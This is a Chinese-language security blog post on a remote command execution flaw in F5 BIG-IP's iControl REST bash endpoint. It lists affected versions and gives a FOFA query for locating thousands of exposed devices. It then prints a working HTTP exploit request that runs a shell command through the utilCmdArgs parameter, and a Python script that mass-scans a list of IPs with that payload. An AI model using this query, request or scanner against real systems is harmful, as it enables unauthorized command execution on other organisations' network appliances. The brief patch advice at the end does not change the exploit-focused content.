免責聲明:本站提供安全工具、程式(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
一:漏洞描述
F5 BIG-IP 是美國 F5 公司的一款內建了網絡流量管理、應用程式安全管理、負載均衡等功能的應用傳遞平台,,F5安全公告更新了BIG-IP,BIG-IQ中的多個嚴重漏洞。
二: 漏洞影響
F5 BIG-IP 16.x: 16.1.0.3
F5 BIG-IP 15.x: 15.1.0.4
F5 BIG-IP 14.x: 14.1.2.6
F5 BIG-IP 13.x: 13.1.3.4
F5 BIG-IP 12.x: 12.1.5.2
F5 BIG-IP 11.x: 11.6.5.2
三: 漏洞複現
通過fofa(會員才能使用該搜尋方法)語句搜尋icon_hash:-335242539(下篇文章來寫通過icon_hash來定位真實的IP位址),搜尋出将近7000條,fofa還是很強大的。
随便通路一個url,登陸頁面如下:
poc如下:該漏洞通過utilCmdArgs參數執行指令。
POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}
響應包為:
四: 漏洞批量檢測POC,将ip.txt放入同級目錄即可。
import requests
import sys
import random
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def poc():
with open(r"ip.txt", "r", encoding='utf8') as scan_url:
for url in scan_url:
if url[:4] != "http":
url = "https://" + url
url = url.strip('\n')
vun_url=url + "/mgmt/tm/util/bash"
headers={
"Authorization": "Basic YWRtaW46QVNhc1M=",
"X-F5-Auth-Token": "",
"Content-Type": "application/json"
}
data='{"command":"run","utilCmdArgs":"-c id"}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response=requests.post(url=vun_url,headers=headers,data=data,verify=False,timeout=2)
if "commandResult" in response.text and response.status_code ==200:
print("目标{}存在漏洞,響應為{}".format(url,json.loads(response.text)["commandResult"]))
else:
print("目标{}不存在漏洞".format(url))
except Exception as e:
print("目标{}請求失敗".format(url))
if __name__ == '__main__':
poc()
檢測效果如下:
五: 修複方法:
官方已釋出上述漏洞的安全更新,建議受影響使用者盡快更新到安全版本。
參考連接配接:
https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ
https://mp.weixin.qq.com/s/lyrVwgSnu0iSehVr3lZiRw
https://mp.weixin.qq.com/s/NFNdr_0_6G0Zd65BvfNA-w